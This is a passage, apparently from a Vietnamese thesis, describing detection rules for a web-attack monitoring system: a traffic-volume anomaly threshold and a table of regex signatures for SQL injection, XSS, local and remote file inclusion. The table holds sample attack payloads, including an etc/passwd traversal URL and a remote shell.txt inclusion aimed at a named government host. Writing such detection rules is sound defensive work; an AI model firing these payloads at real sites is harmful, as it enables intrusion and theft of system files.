Trên cơ sở các kỹ thuật tấn công đƣợc mô tả ở chƣơng II, cần xác định các dạng tấn công web, với các thành phần sau:
o Dạng luật thứ nhất: Dựa trên việc thống kê lƣu lƣợng cho tất cả các hệ thống mạng hiện tại. Theo đó, có thể thống kê số lƣợng sự kiện ra vào của tất cả các mạng theo từng thời điểm trong ngày, từ đó xác định đƣợc lƣợng sự kiện cao nhất và thấp nhất đối với một hệ thống mạng trong ngày, trong tuần. Từ đó, đƣa ra mức độ bất thƣờng cho từng mạng đang đƣợc giám sát. Mức độ định lƣợng bất thƣờng cho lƣu lƣợng mạng có thể phụ thuộc vào nhiều yếu tố, nhƣng thơng thƣờng sẽ cao hơn mức cao nhất khoảng 1000 đến 2000 sự kiện. Con số này là do quá trình theo dõi lƣu lƣợng mạng theo thời gian thực nhằm mục đích tránh các hiện tƣợng lƣu lƣợng tăng cao mà không cảnh báo sớm, do vậy các hệ thống đƣợc giám sát hiện tại của Ban Cơ yếu Chính phủ đƣợc thiết lập ở mức này. Nếu số lƣợng sự kiện vƣợt quá mức đinh lƣợng cao nhất thì cảnh báo bất thƣờng sẽ đƣợc đƣa ra cho hệ thống mạng.
Hình 4.3: Xác định lƣu lƣợng của các thiết bị, và toàn bộ lƣu lƣợng mạng của hệ thống từng phút
o Dạng thứ hai: Dựa trên dấu hiệu nhận dạng, nghi ngờ tấn công. Để xác định đƣợc thành phần này ngƣời quản trị cần phải dựa trên payload của nhật ký hệ thống IIS thu đƣợc và đặc trƣng của từng dạng tấn công để xác định định dạng mẫu đƣa vào tập luật. Ngoài ra, tùy thuộc vào đặc trƣng của các dấu hiện nghi ngờ tấn cơng để ngƣời quản trị có thể sử dụng cách thơng thƣờng là nhận dạng bằng các ký tự string hoặc sử dụng Regex để lọc các dấu hiệu. Dƣới đây là bảng thông tin một số luật đƣợc đƣa vào hệ thống GSANM cho các luật sẽ đƣợc tạo ra nhằm cảnh báo việc tấn công vào ứng dụng web site.
Kiểu tấn công đƣợc cảnh báo
Dấu hiệu nhận dạng tấn cơng (sử dụng biểu thức chính quy Regex)
Tiêm mã SQL UNION, SELECT--
Chuỗi URL request kèm theo có chứa hai từ khóa, UNION hoặc SELECT.
(?:(union(.*)select(.*)from)) Tiêm mã SQL
waitfor delay -- Chuỗi từ khóa chèn vào có chứa ký tự: waitfor delay, DELAY— Tiêm mã SQL
Blind
Chuỗi từ khóa trong payload có chứa các cặp dạng ―or x=y‖ và ―x=y‖ trong đó x và y là các số bất kỳ
Hoặc sử dụng dạng ―and substring(@@version,1,1)=VERSIONHERE‖
Tiêm mã SQL
convert -- Trong payload có chứa từ khóa dạng ―= convert(‖, ‗having ‘ Tiêm mã SQL
Inline Commend--
Dấu hiệu nhận dạng: ―/*!‖ VD:/*!UnIoN*/SeLeCT,
Tiêm mã SQL Between--
Payload chứa từ khóa between: Dạng: ('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--' ('1 AND A = B--')
'1 AND A BETWEEN B AND B--' Tiêm mã SQL
Percentage --
Payload có chứa dạng : %[a-z]% VD'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
Tiêm mã SQL Charunicodeencode
Payload chứa chuỗi %u00: ('SELECT FIELD%20FROM
TABLE')→'%u0053%u0045%u004C%u0045%u0043%u0054%u 0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u 0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C% u0045' Tiêm mã SQL extractvalue
Sử dụng hàm extractvalue() để lấy dữ liệu. http://www.site.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,version()))--+
Tấn công XSS Trong payload của Web Server có chứa từ khóa <script> VD: ((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((%3E)|>) Local File Inclusion
(LFI)
URL payload có dạng ―=../‖ hoặc ―=/..‖ hoặc ―=/‖
http://mvp.thaibinh.gov.vn/preview.php?file=../../../../etc/passwd http://mvp.thaibinh.gov.vn/preview.php?file=example.html Remote File Inclusion Đƣờng dẫn có chứa chuỗi ―=http://‖ http://mvp.thaibinh.gov.vn/index.php?x=http://www.[MYSITE].co m/shell.txt?
Tiêm mã SQL URL chứa các từ khóa: Concat, order by, order+by, information, tables, column, substring, convert
Detects etc/passwd inclusion attempts
Dấu hiệu nhận dạng: (?:etc\/\W*passwd)
Bảng 4.1: Bảng mô tả các tấn công